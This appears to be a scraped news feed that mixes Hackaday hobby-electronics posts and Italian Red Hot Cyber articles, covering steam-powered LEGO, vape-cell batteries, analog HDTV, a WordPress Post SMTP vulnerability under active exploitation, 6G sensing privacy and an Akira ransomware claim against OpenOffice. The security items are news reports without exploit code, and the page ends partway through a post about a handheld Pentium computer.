Salta al contenuto principale

Making Steam-Powered LEGO Machines


Over the decades we have seen a lot of methods for powering LEGO-based contraptions, ranging from LEGO Technic pneumatics to electric motors, but what about steam power? We have all seen those cute little model steam engines that can definitely put out some power. Sure, you can just drop those in like a kind of confused internal combustion engine, or you can try to make a steam engine that actually tries to be directly compatible with LEGO.

While exploring this topic, [Jamie’s Brick Jams] on YouTube found that the primary concern here is simply the very hot steam produced by the boiler. While not a surprise to anyone who has ever run a model steam engine, this poses a major challenge to the thermoplastics used by LEGO.

Obviously a boiler cannot be made out of plastic, but the steam turbine can. That said, material selection here is key, as the hot, wet steam produced by the boiler demolishes PLA parts and ruined the original and very unsafe copper boiler in the process. Ultimately a LEGO Technic-compatible steam turbine was printed in high temperature resistant PAHT-CF and PC filament, which enables a steam-powered LEGO walker to come to life, albeit with a distinct lack of power.

Model steam engine enthusiasts are of course quick to point out that you should try to create dry steam through superheating, definitely add a safety valve and so on, all of which should make for an even more powerful and safe LEGO steam engine. For a rundown of how steam engines work, [Lawrie] did an excellent video on the basics a while back, as well as a video playlist full of demonstrations of both classical Mamod model engines and questionable modern takes.

Suffice it to say that although model steam engines look like toys, they involve fire, hot steam and other fascinating ways to melt things, light them on fire and cause painful injuries, so definitely follow a safety briefing before attempting any of it at home.

youtube.com/embed/g07xCV3uOJw?…


hackaday.com/2025/11/06/making…


2025 Component Abuse Challenge: Overdriven LEDs Outshine the Sun


A drone is shown hovering in the sky, with two bright lights shining from its underside.

Tagging wildlife is never straightforward in the best of times, but it becomes a great deal more complicated when you’re trying to track flying insects. Instead of trying to use a sensor package, [DeepSOIC] attached tiny, light retroreflectors to bees and hornets, then used a pulsed infrared light mounted on a drone to illuminate them. Two infrared cameras on the drone track the bright dot that indicates the insect, letting the drone follow it. To get a spot bright enough to track in full sunlight, though, [DeepSOIC] had to drive some infrared LEDs well above their rated tolerances.

The LEDs manage to survive because they only fire in 15-µs pulses at 100 Hz, in synchrony with the frame rate of the cameras, rather like some welding cameras. The driver circuit is very simple, just a MOSFET switch driven by an external pulse source, a capacitor to steady the supply voltage, and a current-limiting resistor doing so little limiting that it could probably be removed. LEDs can indeed survive high-current pulses, so this might not really seem like component abuse, but the 5-6 amps used here are well beyond the rated pulse current of 3 amps for the original SFH4715AS LEDs. After proving the concept, [DeepSOIC] switched to 940 nm LEDs, which provide more contrast because the atmosphere absorbs more sunlight around this wavelength. These new LEDs were rated for 5A, so they weren’t being driven so far out of spec, but in tests they did survive current up to 10A.

We’ve seen a similar principle used to drive laser diodes in very high-power pulses a few times before. For an opposite approach to putting every last bit of current through an LED, check out this low-power safety light.

youtube.com/embed/cRh2XufYJws?…

2025 Hackaday Component Abuse Challenge


hackaday.com/2025/11/06/2025-c…


Share Your Projects: Imperfectionism


Everyone has a standard for publishing projects, and they can get pretty controversial. We see a lot of people complain about hacks embedded in YouTube videos, social media threads, Discord servers, Facebook posts, IRC channels, different degrees of open-sourcing, licenses, searchability, and monetization. I personally have my own share of frustrations with a number of these factors.

It’s common to believe that hacking as a culture doesn’t thrive until a certain set of conditions is met, and everyone has their own set of conditions in mind. My own dealbreaker, as you might’ve seen, is open-sourcing of code and hardware alike – I think that’s a sufficiently large barrier for hacking being repeatable, and repeatability is a big part of how hacking culture spreads.

This kind of belief is often self-limiting. Many people believe that their code or PCB source file is not a good contribution to hacking culture unless it meets a certain cleanliness or completeness standard. This is understandable, and I do that, too.

Today, I’d like to argue against my own view, and show how imperfect publishing helps build hacking culture despite its imperfections. Let’s talk about open-source in context of 3D printing.

The Snazzy Ugly Duckling


One little-spoken aspect of 3D printing is how few models are open-source. Printable models published exclusively as STLs are commonplace, STEPs are much less popular, and from my experience, it’s soul-crushingly rare to see a source file attached to a model on Printables. I struggle to say that’s a good thing, and quite obviously, that negatively impacts 3D printing culture – getting into 3D modeling is that much harder if you can’t reference the sources for 95% of models you might get inspired by.

Of course, part of that is that 3D CADs are overwhelmingly closed-source paid software, and there are like five different ones with roughly equal shares of usage. It’s hard to meaningfully share sources from within a paywalled siloized market. Also, unlike software source code, STLs are very much cross-platform. Electronics has a way better analogy for STLs, they’re just like gerbers – gerbers are easy to export, and to inexperienced people, they’ll feel like all that anyone would ever need.

For a quick example – out of these eight Printables models taken at random, only the “drawers mini-cabinet” has a source file attached.

Then, there’s a self-consciousness and perfectionism. While rare, I’ve seen “I will clean this up and publish later” happen in 3D printing spaces too – it’s a thoroughly non-viable promise there too, but I get why people say that, I’ve personally made and failed on such promises a good few times myself. I’m glad that this isn’t a popular excuse so far, but, as more people adopt OpenSCAD, Blender, and FreeCAD, with their universally-accessible files, maybe we’ll see it resurface.

Asking for 3D model sources should probably become part of hacker culture, just like it helped with software. I don’t think it’s great that 3D printing so often implies closed-source 3D models, and undoubtedly that has limited the growth of 3D modeling as a hobby. I strongly wish I could git clone the 3D model projects I find online, and there’s a whole lot of models that are useless to me because I can’t git clone and modify them.

At the same time? 3D printing carries the hacker flag quite strongly, despite the imperfections, and you can notice it by just how often 3D printing appears on our pages. We can and should point at aspects of hacker culture that 3D printing doesn’t yet represent, and while at it, we benefit from the technology, as much as its imperfections hurt us.

Where Is Hackerdom Found?


Would I argue the same about Discord servers? Mastodon-hosted threads? YouTube videos? GitHub repos with barely-documented code? For sure. There’s no shortage of criticism about those, mostly about accessibility issues. Servers and videos are often not externally discoverable, which is surprisingly painful for hacker culture’s ability to thrive and grow. At the very least, we are badly missing out – for instance, I’d say Discord servers and YouTube videos alike are in dire need of external log/transcript hosting capabilities, and tech-oriented Discord servers specifically could benefit from public logs in the same way that modern Discourse forums have them from the get-go.

That’s for the disadvantages. As for upsides, YouTube videos make hardware hacking into entertainment for potential hackers not enthralled by scrolling through a blog interspersed with pictures, and, they position hacking culture in front of people who’d otherwise miss out on it. Let’s take [DIY Perks], a hugely popular YouTube channel. Would that dual-screen laptop build we covered have worked out great as a blog post, or maybe as a dual post-video, as some hackers do? For sure. At the same time, it gets hacking in front of people’s faces.

Discord blows as a platform, and I’ve written a fair bit about just how much it blows. One such snippet is in the article I wrote about the Beepy project, where the Discord server was crucial to growing Beepy as a community-contributed project. Would people benefit from the Beepy project having publicly available logs? Most certainly, and I’d argue it’s hurt the Beepy project being more externally discoverable. Is that all?

Discord has been an unprecedented communications platform for the Beepy project, and we’d outright lose out if there weren’t hardware hacking communities thriving on Discord, like Hackaday Discord does. I think we should remedy these kinds of problems by building helper tools and arguing for better cultural norms, just like we did with software licenses, because giving up on platforms like Discord currently has a significantly subpar cost-benefit analysis.

What about imperfect code? Sometimes, a hacker figures out a small part of a sensor’s protocol or a basic feature, and as much as the code might be insufficient or hastily written, they publish it. Have you ever stumbled upon such a repository? I have, sometimes I was happy, and sometimes I was disappointed, but either which way, such code tend to require extra work. In the end, I’ve noticed that it almost always helped way more than it hurt, which in turn has eventually led to me publishing more and more.

I think we’d benefit from a culture where “publish later after cleanup” is replaced by “here’s the code, and I might push some cleanup commits later”. It’s a better contribution to hacker culture and to people who enjoy your work, and the “might” part makes it more honest. It’ll also get your publishing muscles in better shape so that you’re quick to post about things you really ought to post about. For what it’s worth, I don’t think it hurts if this is assisted by social media likes, too.

Strength Through Presence


Survival of hacker culture has so far heavily relied on its presence in media all across, and an ability to press the “maybe I can hack too” button in other people’s brains through that presence. That said, every non-open 3D model, Discord server with non-public logs, YouTube channel with non-transcribed videos, or a completely ephemeral TikTok channel, still palpably paves a way for future hackers to join our communities, wherever hackerdom might be within ten years’ time.

I think the key to informational impedance mismatches is making it easier for people to meet the high standards we expect, and helping people meet them where appropriate, in large part, by example. It looks like hacking is strongest when present everywhere, even when some seams, and I hope that this kind of overwhelming presence helps us overcome modern-day unique cultural hurdles in a way we couldn’t hope for just a decade ago.


hackaday.com/2025/11/06/share-…


DIY Powerwall Blows Clouds, Competition Out of the Water


Economists have this idea that we live in an efficient market, but it’s hard to fathom that when disposable vapes are equipped with rechargeable lithium cells. Still, just as market economists point out that if you leave a dollar on the sidewalk someone will pick it up, if you leave dollars worth of lithium batteries on the sidewalk, [Chris Doel] will pick them up and build a DIY home battery bank that we really hope won’t burn down his shop.
Testing salvaged batteries.
The Powerwall-like arrangement uses 500 batteries salvaged from disposable vapes. His personal quality control measure while pulling the cells from the vapes was to skip any that had been discharged past 3 V. On the other hand, we’d be conservative too if we had to live with this thing, solid brick construction or not.

That quality control was accomplished by a clever hack in and of itself: he built a device to blow through the found vapes and see if they lit up. (That starts at 3:20 in the vid.) No light? Not enough voltage. Easy. Even if you’re not building a hoe powerbank, you might take note of that hack if you’re interested in harvesting other people’s deathsticks for lithium cells. The secret ingredient was the pump from a CPAP machine. Actually, it was the only ingredient.)

In another nod to safety, he fuses every battery and the links between the 3D printed OSHA unapproved packs. The juxtoposition between janky build and careful design nods makes this hack delightful, and we really hope [Chris] doesn’t burn down his shed, because like the cut of his jib and hope to see more hacks from this lad. They likely won’t involve nicotine-soaked lithium, however, as the UK is finally banning disposable vapes.

In some ways, that’s a pity, since they’re apparently good for more than just batteries — you can host a website on some of these things. How’s that for market efficiency?

youtube.com/embed/dy-wFixuRVU?…


hackaday.com/2025/11/06/diy-po…


12,5 milioni di film HD al secondo! Il cavo sottomarino di Amazon che collegherà gli USA all’Irlanda


Tra qualche anno, l’Irlanda e gli Stati Uniti saranno collegati da un cavo di comunicazione sottomarino progettato per aiutare Amazon a migliorare i suoi servizi AWS.

I cavi sottomarini sono una parte vitale dell’infrastruttura che collega i continenti. Secondo i media, attualmente sono circa 570 i cavi posati attraverso oceani e mari, e altri 81 sono in programma. Tra questi c’è il nuovo cavo Amazon Fastnet, progettato per collegare gli Stati Uniti e l’Irlanda in pochi anni e migliorare la rete AWS.

Come annunciato da Amazon in un comunicato stampa, il cavo sottomarino verrà posato tra il Maryland, negli Stati Uniti, e la contea di Cork, in Irlanda. Sebbene Amazon non abbia specificato la lunghezza esatta del cavo AWS, la distanza tra i due punti è di circa 5.300 chilometri (3.000 miglia) in linea d’aria. Amazon prevede di completare il progetto entro il 2028.

Secondo Amazon, il collegamento tra Maryland e Cork è importante per due motivi. In primo luogo, Fastnet è progettato per fungere da collegamento di comunicazione di backup in caso di guasto di altri cavi sottomarini. Poiché la riparazione di tali cavi sottomarini è complessa, il ripristino della funzionalità dopo un danno può richiedere più tempo. Fastnet è inoltre progettato per soddisfare la crescente domanda di cloud computing e intelligenza artificiale tramite i servizi AWS.

Il cavo sottomarino, spesso 37 millimetri nel punto più largo, trasmetterà i dati tra i due punti utilizzando la tecnologia in fibra ottica. Secondo Amazon, ciò consentirà velocità di trasferimento dati fino a 320 terabit al secondo, paragonabili allo streaming simultaneo di 12,5 milioni di film in HD.

L’elevata capacità di trasmissione consentirà al sistema di monitoraggio automatizzato di Amazon AWS di gestire e reindirizzare più facilmente i carichi pesanti. Inoltre, il cavo fornisce ad Amazon un ulteriore livello di ridondanza, mitigando l’impatto di eventuali guasti su altri cavi.

Per prevenire guasti, il cavo sottomarino sarà meglio protetto dalle influenze esterne nelle zone costiere. Oltre ai conduttori in acciaio più sottili che proteggono la fibra ottica all’interno del cavo, nelle sezioni più piatte viene utilizzato uno strato aggiuntivo. In questi casi, fili in acciaio più spessi avvolgono l’intero cavo e sono a loro volta rivestiti da una guaina in nylon. Secondo Amazon, questa soluzione è progettata per proteggere meglio il cavo da “fattori naturali e artificiali”.

L'articolo 12,5 milioni di film HD al secondo! Il cavo sottomarino di Amazon che collegherà gli USA all’Irlanda proviene da Red Hot Cyber.


Japan’s Forgotten Analog HDTV Standard Was Well Ahead Of Its Time


When we talk about HDTV, we’re typically talking about any one of a number of standards from when television made the paradigm switch from analog to digital transmission. At the dawn of the new millenium, high-definition TV was a step-change for the medium, perhaps the biggest leap forward since color transmissions began in the middle of the 20th century.

However, a higher-resolution television format did indeed exist well before the TV world went digital. Over in Japan, television engineers had developed an analog HD format that promised quality far beyond regular old NTSC and PAL transmissions. All this, decades before flat screens and digital TV were ever seen in consumer households!

Resolution


Japan’s efforts to develop a better standard of analog television were pursued by the Science and Technical Research Laboratories of NHK, the national public broadcaster. Starting in the 1970s, research and development focused on how to deliver a higher-quality television signal, as well as how to best capture, store, and display it.
The higher resolution of Hi-Vision was seen to make viewing a larger, closer television more desirable. The figures chosen were based on an intended viewing distance that of three times the height of the screen. Credit: NHK Handbook
This work led to the development of a standard known as Hi-Vision, which aimed to greatly improve the resolution and quality of broadcast television. At 1125 lines, it offered over double the vertical resolution of the prevailing 60 Hz NTSC standard in Japan. The precise number was chosen for meeting minimum requirements for image quality for a viewer with good vision, while being a convenient integer ratio to NTSC’s 525 lines (15:7), and PAL’s 625 lines (9:5). Hi-Vision also introduced a shift to the 16:9 aspect ratio from the more traditional 4:3 used in conventional analog television. The new standard also brought with it improved audio, with four independent channels—left, center, right, and rear—in what was termed “3-1 mode.” This was not unlike the layout used by Dolby Surround systems of the mid-1980s, though the NHK spec suggests using multiple speakers behind the viewers to deliver the single rear sound channel.
Hi-Vision offered improved sound, encoded with PCM. Credit: NHK handbook
Hi-Vision referred most specifically to the video standard itself; the broadcast standard was called MUSE—standing for Multiple sub-Nyquist Sampling Encoding. This was a method for dealing with the high bandwidth requirements of higher-quality television. Where an NTSC TV broadcast might only need 4.2 MHz of bandwidth, the Hi-Vision standard needed 20-25 MHz of bandwidth. That wasn’t practical to fit in alongside terrestrial broadcasts of the time, and even for satellite delivery, it was considered too great. Thus, MUSE offered a way to compress the high-resolution signal down into a more manageable 8.1 MHz, with a combination of dot interlacing and advanced multiplexing techniques. The method used meant that ultimately four frames were needed to make up a full image. Special motion-sensitive encoding techniques were also used to limit the blurring impact of camera pans due to the use of the dot interlaced method. Meanwhile, the four-channel digital audio stream was squeezed into the vertical blanking period.

MUSE broadcasts began on an experimental basis in 1989. NHK would eventually begin using the standard regularly on its BShi satellite service, with a handful of other Japanese broadcasters eventually following suit. Broadcasts ran until 2007, when NHK finally shut down the service with digital TV by then well established.

youtube.com/embed/8uKv4PLzrV0?…

An NHK station sign-on animation used from 1991 to 1994.
A station ident from NHK’s Hi-Vision broadcasts from 1995 to 1997. Note the 16:9 aspect ratio—then very unusual for TV. Credit: NHK
The technology wasn’t just limited to higher-quality broadcasts, either. Recorded media capable of delivering higher-resolution content also permeated the Japanese market. W-VHS (Wide-VHS) hit the market in 1993 as a video cassette standard capable of recording Hi-Vision/MUSE broadcast material. The W moniker was initially chosen for its shorthand meaning in Japanese of “double”—since Hi-Vision used 1125 lines which was just over double the 525 lines in an NTSC broadcast.

Later, in 1994, Panasonic released its Hi-Vision LaserDisc player, with Pioneer and Sony eventually offering similar products. They similarly offered 1,125 lines (1,035 visible) of resolution in a native 16:9 aspect ratio. The discs were read using a narrower-wavelength laser than standard laser discs, which also offered improved read performance and reliability.

youtube.com/embed/PA2fF9-7tWo?…

Sample video from a MUSE Hi-Vision Laserdisc. Note the extreme level of detail visible in the makeup palettes and skin, and the motion trails in some of the lens flares.

The hope was that Hi-Vision would become an international standard for HDTV, supplanting the ugly mix of NTSC, PAL, and SECAM formats around the world. Unfortunately, that never came to pass. While Hi-Vision and MUSE did offer a better quality image, there simply wasn’t much content that was actually broadcast in the standard. Only a few channels in Japan were available, creating a limited incentive for households to upgrade their existing sets. Similarly, the amount of recorded media available was also limited. The bandwidth requirements were also too great; even with MUSE squishing the signals down, the 8.1MHz required was still considered too much for practical use in the US market. Meanwhile, being based on a 60 Hz standard meant the European industry was not interested.

Further worsening the situation was that by 1996, DVD technology had been released, offering better quality and all the associated benefits of a digital medium. Digital television technology was not far behind, and buildouts began in countries around the world by the late 1990s. These transmissions offered higher quality and the ability to deliver more channels with the same bandwidth, and would ultimately take over.

youtube.com/embed/pJupQw1FtW8?…

Only a handful of Hi-Vision displays still exist in the world.

Hi-Vision and MUSE offered a huge step up in image quality, but their technical limitations and broadcast difficulties meant that they would never compete with the new digital technologies that were coming down the line. There was simply not enough time for the technology to find a foothold in the market before something better came along. Still, it’s quite something to look back on the content and hardware from the late 1980s and early 1990s that was able, in many ways, to measure up in quality to the digital flat screen TVs that wouldn’t arrive for another 15 years or so. Quite a technical feat indeed, even if it didn’t win the day!


hackaday.com/2025/11/06/japans…


Post SMTP sotto sfruttamento attivo: 400.000 siti WordPress sono a rischio


Gli aggressori stanno attaccando i siti web WordPress sfruttando una vulnerabilità critica nel plugin Post SMTP, che conta oltre 400.000 installazioni. Gli hacker stanno dirottando gli account amministratore e ottenendo il controllo completo sulle risorse vulnerabili.

Post SMTP è uno dei plugin più popolari per l’invio di email da siti WordPress. I suoi sviluppatori lo propongono come un’alternativa avanzata alla funzione standard wp_mail(), offrendo funzionalità avanzate e maggiore affidabilità.

La vulnerabilità è stata scoperta da un ricercatore di sicurezza di nome netranger, che l’ha segnalata a Wordfence l’11 ottobre. Le è stato assegnato l’identificatore CVE-2025-11833 (punteggio CVSS 9,8). Il bug interessa tutte le versioni di Post SMTP dalla 3.6.0 in poi.

La radice del problema risiede nella mancanza di controllo dei diritti di accesso quando si utilizza la funzione _construct in PostmanEmailLogs.

Il componente responsabile della registrazione delle email inviate restituisce direttamente il contenuto del log su richiesta, senza verificare chi lo sta richiedendo. Di conseguenza, chiunque può leggere le email memorizzate nei log, inclusi i messaggi di reimpostazione della password con link per modificare le credenziali di amministratore. Intercettando un’email di questo tipo, un hacker criminale può modificare la password dell’amministratore e ottenere il controllo completo del sito.

Wordfence ha notificato allo sviluppatore del plugin la vulnerabilità critica il 15 ottobre, ma la patch è stata rilasciata solo il 29 ottobre: la versione 3.6.1 corregge il bug. Tuttavia, secondo le statistiche di WordPress.org, circa la metà degli utenti del plugin ha installato l’aggiornamento, il che significa che circa 200.000 siti web rimangono vulnerabili.

Quel che è peggio è che gli hacker stanno già sfruttando quest’ultima vulnerabilità. Secondo gli esperti, i tentativi di sfruttare la vulnerabilità CVE-2025-11833 sono stati registrati dal 1° novembre e, negli ultimi giorni, l’azienda ha bloccato oltre 4.500 attacchi di questo tipo sui siti web dei suoi clienti. Considerando che Wordfence protegge solo una parte dell’ecosistema WordPress, il numero effettivo di tentativi di hacking potrebbe essere nell’ordine delle decine di migliaia.

Vale la pena notare che questa è la seconda grave vulnerabilità scoperta in Post SMTP negli ultimi mesi. Nel luglio 2025, l’azienda di sicurezza informatica PatchStack ha scoperto una vulnerabilità simile , CVE-2025-24000. Questo bug consentiva anche la lettura dei log e l’intercettazione delle email di reimpostazione della password, anche da parte di utenti con privilegi minimi.

L'articolo Post SMTP sotto sfruttamento attivo: 400.000 siti WordPress sono a rischio proviene da Red Hot Cyber.


Nella mente dell’hacker


I dilettanti hackerano i computer, i professionisti hackerano le persone. Questa efficace e famosa sintesi di cosa significhi l’hacking, Bruce Schneier la argomenta con un raffinato ragionamento nel suo ultimo libro: La mente dell’hacker. Trovare la falla per migliorare il sistemapubblicato nel 2024 in italiano da Luiss University Press.

Il titolo dice già molto. Intanto l’hacker non è più il mostro della peggiore pubblicistica degli ultimi anni, ma una figura che va letta in chiaroscuro rispetto all’evoluzione dei sistemi umani.

In aggiunta, l’hacking, l’esplorazione delle possibilità all’interno di un sistema dato, termine in origine legato al mondo dell’informatica, secondo Schneier è diventato una pratica onnipresente nei sistemi economici, finanziari e sociali. Approccio metodico alla ricerca delle vulnerabilità strutturali che definiscono il nostro mondo, l’hacking dimostra come ogni sistema, dalle leggi fiscali alle intelligenze artificiali, può essere manipolato e sfruttato. Dall’hacking del sistema fiscale per pagare meno tasse, vedi Google & Co. fino al jackpotting, al ransomware e agli attacchi cibernetici tra gli Stati. Per l’autore ogni hack può essere letto come strumento chiave nella gestione del potere e del denaro nei suoi molteplici aspetti.

Un hack è infatti «un’attività consentita da un sistema, che sovverte però gli scopi o gli intenti del sistema stesso». E cos’altro è un sistema se non «un processo complesso, determinato da una serie di regole o norme, pensato per produrre un o più esisti desiderati»? Quindi l’hacking è esattamente questo: individuare la vulnerabilità di un sistema e trovare l’exploit per sfruttarla. In definitiva vale per ogni sistema, quelli informatici, quelli sociotecnici, quelli cognitivi. Lo scopo dell’hacking è di ottenere un vantaggio. Ma le contromisure sono sempre possibili. E questo vale anche per la democrazia, che può difendersi dagli usi imprevisti della libertà che consente, e vale anche per l’Intelligenza Artificiale: hackerandola capiamo meglio come possa essere messa al servizio delle persone e non della guerra e del profitto. Poiché libertà e democrazia riposano oggi su sistemi informatici, gli hacker possono ancora fregiarsi del titolo di «eroi della rivoluzione informatica» come li chiamava Stephen Levy già nel 1996.


dicorinto.it/articoli/recensio…


Countdown To Pi 1 Loss Of Support, Activated


The older Raspberry Pi boards have had a long life, serving faithfully since 2012. Frankly, their continued support is a rarity these days — it’s truly incredible that an up-to-date OS image can still be downloaded for them in 2025. All good things must eventually come to an end though, and perhaps one of the first signs of that moment for the BCM2385 could be evident in Phoronix’s report on Debian dropping support for MIPS64EL & ARMEL architectures. Both are now long in the tooth and other than ARMEL in the Pi, rarely encountered now, so were it not for the little board from Cambridge this might hardly be news. But what does it mean for the older Pi?

It’s first important to remind readers that there’s no need to panic just yet, as the support is going not for the mainstream Debian releases, but the unstable and experimental ones. The mainstream Debian support period for the current releases presumably including the Debian-based Raspberry Pi OS extends until 2030, which tallies well with Raspberry Pi’s own end-of-life date for their earlier boards. But it’s a salutary reminder that that the clock’s ticking, should (like some of us) you be running an older Pi. You’ve got about five years.


hackaday.com/2025/11/06/countd…


Ti hanno detto che il 6G sarà veloce vero? Ma non ti hanno detto tutta la verità


Non è “solo più veloce”: il 6G cambia la natura stessa della rete!

Quando parliamo di 6G rischiamo di ridurre tutto a un upgrade di velocità, come se la rete del futuro fosse solo un 5G con più cavalli. In realtà il salto non riguarda la banda, ma il modo in cui la rete percepirà il mondo. Per la prima volta, una rete mobile non si limiterà a trasmettere e ricevere segnali, ma osserverà l’ambiente per poter operare correttamente.

MSCP: la fusione tra sensori visivi e radio che cambia il paradigma


Lo studio IEEE introduce la tecnica MSCP, un approccio ibrido che fonde informazioni RF e immagini ambientali. Le telecamere analizzano il contesto, i modelli AI prevedono il comportamento del canale radio, il sistema corregge la trasmissione prima che l’ostacolo avvenga.

Il guadagno, scientificamente parlando, è enorme: oltre il 77% in accuratezza predittiva rispetto alle tecniche basate solo sul segnale radio. Ma per ottenere questa precisione, la rete deve sapere chi si muove, dove si muove e come si muove.

Dettagli tecnici e risultati completi sono descritti nel paper IEEE su MSCP e nei lavori sul dataset DeepSense 6G che abilitano la predizione multimodale del canale.

Il prezzo nascosto: la rete non “vede i dati”, vede i corpi


Qui non stiamo parlando di analisi del traffico o telemetria tecnica. Stiamo parlando di una rete che, per funzionare, deve costruire un modello spazio-temporale dei movimenti umani. Non importa se non riconosce i volti: la traiettoria è già un identificatore comportamentale.

Lo dice il GDPR, lo conferma l’AEPD, lo dimostrano anni di studi su fingerprinting e re-identificazione tramite metadati. Se il Wi-Fi tracking è già considerato trattamento di dati personali, immaginate un sistema che combina radio, video e machine learning in tempo reale.

La sorveglianza senza telecamere dichiarate: il trucco perfetto


Una telecamera classica richiede cartelli, informative, limiti d’uso, base giuridica. Una rete 6G con sensing integrato no: è “parte dell’infrastruttura tecnica”. Non registra video, genera metadati. Non sembra sorveglianza, ma lo è. E lo sarà in modo più capillare, invisibile e incontestabile di qualunque sistema CCTV. Non serve più installare un occhio elettronico su un palo: basta un’antenna su un tetto. La direzione “sensing + AI” non è episodica: progetti come DeepSense 6Graccolgono dati reali multi-modalità (mmWave, camera, GPS, LiDAR, radar) proprio per abilitare queste funzioni di predizione del canale e di localizzazione.

Violazione della privacy? No, violazione della sovranità del corpo nello spazio


Il vero rischio non è lo sguardo sul singolo individuo, ma la perdita del diritto collettivo all’invisibilità fisica. Una rete che mappa i movimenti delle persone in modo continuo abilita, per definizione, scenari di monitoraggio sociale: flussi di protesta, geofencing comportamentale, analisi predittiva dei gruppi, controllo delle folle, profiling ambientale. Tutto senza dover invocare né il riconoscimento facciale né la biometria classica.

Il quadro legale europeo oggi sarebbe già incompatibile – se qualcuno lo facesse davvero rispettare


Il principio di minimizzazione del GDPR renderebbe difficilmente difendibile l’uso di visione artificiale per risolvere un problema tecnico delle telecomunicazioni, se esistono alternative meno invasive. L’ePrivacy vieta analisi occulte dei terminali. L’AI Act classificherà i sistemi di sorveglianza ambientale come ad alto rischio. Ma il vero nodo è un altro: finché la tecnologia resta nei paper, il diritto non reagisce. Quando arriverà nei prodotti, sarà già troppo tardi.

La domanda finale non è tecnica: è politica

  • È lecito usare la visione artificiale per migliorare un canale radio?
  • È proporzionato?
  • È necessario?

Chi decide quando la rete osserva, cosa osserva, per quanto e con quali limiti?
E soprattutto: chi garantisce che lo farà solo per “ottimizzare la qualità del servizio”?

Conclusioni


Se accettiamo senza reagire l’idea che “la rete deve vederci per funzionare”, allora non ci servirà più un garante della privacy. Ci servirà un garante del movimento umano non monitorato.

Il 6G sarà una meraviglia tecnologica.
Ma ricordiamoci una regola semplice:
quando una tecnologia ti offre prestazioni straordinarie in cambio di un nuovo livello di tracciamento, non sta innovando.
Sta negoziando la tua libertà.

E come sempre, la parte debole del contratto… sei tu.

La differenza tra infrastruttura e sorveglianza è una sola cosa:
il limite che decidi di imporle prima che diventi inevitabile.

L'articolo Ti hanno detto che il 6G sarà veloce vero? Ma non ti hanno detto tutta la verità proviene da Red Hot Cyber.


Make Metal Rain with Thermal Spraying


Alec using the arc spraying device

For those of us hackers who have gone down a machining rabbit hole, we all know how annoying it can be to over-machine a part. Thermal spraying, while sounding sci-fi, is a method where you can just spray that metal back on your workpiece. If you don’t care about machining, how about a gun that shoots a shower of sparks just to coat your enemies in a layer of metal? Welcome to the world of thermal spraying, led by the one and only [Alec Steele].

There are three main techniques shown that can be used to coat using metal spools. The first, termed flame spraying, uses a propane flame and compressed air to blast fine drops of molten metal onto your surface. A fuel-heavy mixture allows the metal to remain unoxidized and protect any surface beneath. Perhaps one of the most fun to use is the arc method of thermal spray. Two wires feed together to short a high current circuit; all it takes from there is a little pressured air to create a shower of molten metal. This leaves the last method similar to the first, but uses a powder material rather than the wires used in flame spraying.

As with much crazy tech, the main uses of thermal spraying are somewhat mundane. Coating is applied to prevent oxidation, add material to be re-machined, or improve the mechanical resistance of a part. As expensive as this tech is, we would love to see someone attempt an open-source version to allow all of us at Hackaday to play with. Can’t call it too crazy when we have people making their own X-ray machines.

youtube.com/embed/e-QcseGvU5o?…


hackaday.com/2025/11/06/make-m…


Apache OpenOffice sotto attacco ransomware, ma la fondazione contesta


Il progetto Apache OpenOffice è finito sotto i riflettori dopo che il gruppo ransomware Akira ha affermato di aver effettuato un attacco informatico e di aver rubato 23 gigabyte di dati interni.

Tuttavia, l’organizzazione che supervisiona lo sviluppo della suite per ufficio contesta la veridicità di queste affermazioni, citando la mancanza di prove di una fuga di dati e una discrepanza con la struttura effettiva del progetto.

Informazioni sul presunto attacco sono apparse il 30 ottobre sul sito di Akira leak. Gli aggressori hanno affermato di aver avuto accesso a report interni, documenti finanziari e dati personali, inclusi indirizzi, numeri di telefono, patenti di guida, numeri di previdenza sociale e persino informazioni bancarie.

Hanno affermato che la fuga di notizie non riguardava solo materiale aziendale, ma conteneva anche dettagli su problemi relativi al software stesso.

I rappresentanti dell’Apache Software Foundation hanno espresso dubbi sulla veridicità di tali affermazioni. Non possiedono informazioni che potrebbero essere rubate da aggressori, poiché il progetto OpenOffice è creato e gestito esclusivamente da volontari che non sono dipendenti della fondazione.

La struttura del progetto non include posizioni retribuite, il che significa che non vengono raccolti dati relativi al personale o alla contabilità. Lo sviluppo è condotto pubblicamente tramite mailing list aperte e tutte le richieste e le discussioni sono liberamente accessibili.

È stato inoltre sottolineato che non è stata avanzata alcuna richiesta di riscatto alla fondazione e che non sono stati rilevati segni di compromissione dell’infrastruttura del progetto. I rappresentanti dell’organizzazione hanno chiarito che, al momento dell’indagine, non erano stati stabiliti contatti con le forze dell’ordine o con specialisti della sicurezza di terze parti, in quanto non sussistevano i presupposti per farlo.

Nonostante le affermazioni degli hacker, il gruppo Akira non ha ancora pubblicato alcuna prova a sostegno delle proprie affermazioni. All’inizio di novembre, nessun materiale presumibilmente ottenuto dall’attacco era stato reso pubblico.

L'articolo Apache OpenOffice sotto attacco ransomware, ma la fondazione contesta proviene da Red Hot Cyber.


Spectravideo Computers Get A Big Upgrade


Spectravideo is not exactly the most well-known microcomputer company, but they were nevertheless somewhat active in the US market from 1981 to 1988. Their computers still have a fanbase of users and modders. Now, as demonstrated by [electricadventures], you can actually upgrade your ancient Spectravideo machine with some modern hardware.

The upgrade in question is the SVI-3×8 PicoExpander from [fitch]. It’s based on a Raspberry Pi Pico 2W, and is built to work with the Spectravideo 318 and 328 machines. If you’re running a 328, it will offer a full 96kB of additional RAM, while if you’re running a 318, it will add 144 kB more RAM and effectively push the device up to 328 spec. It’s also capable of emulating a pair of disk drives or a cassette drive, with saving and loading images possible over Wi-Fi.

It’s worth noting, though, that the PicoExpander pushes the Pico 2W well beyond design limits, overclocking it to 300 MHz (versus the original 150 MHz clock speed). The makers note it is “bleeding edge” hardware and that it may not last as long as the Spectravideo machines themselves.

Design files are available on Github if you want to spin up your own PicoExpander, or you can just order an assembled version. We’ve seen a lot of other neat retrocomputer upgrades built around modern hardware, too. Video after the break.

youtube.com/embed/ACU958Gl7Ac?…

[Thanks to Stephen Walters for the tip!]


hackaday.com/2025/11/05/spectr…


A Pentium In Your Hand


Handheld computers have become very much part of the hardware hacker scene, as the advent of single board computers long on processor power but short on power consumption has given us the tools we need to build them ourselves. Handheld retrocomputers face something of an uphill struggle though, as many of the components are over-sized, and use a lot of power. [Changliang Li] has taken on the task though, putting an industrial Pentium PC in a rather well-designed SLA printed case.

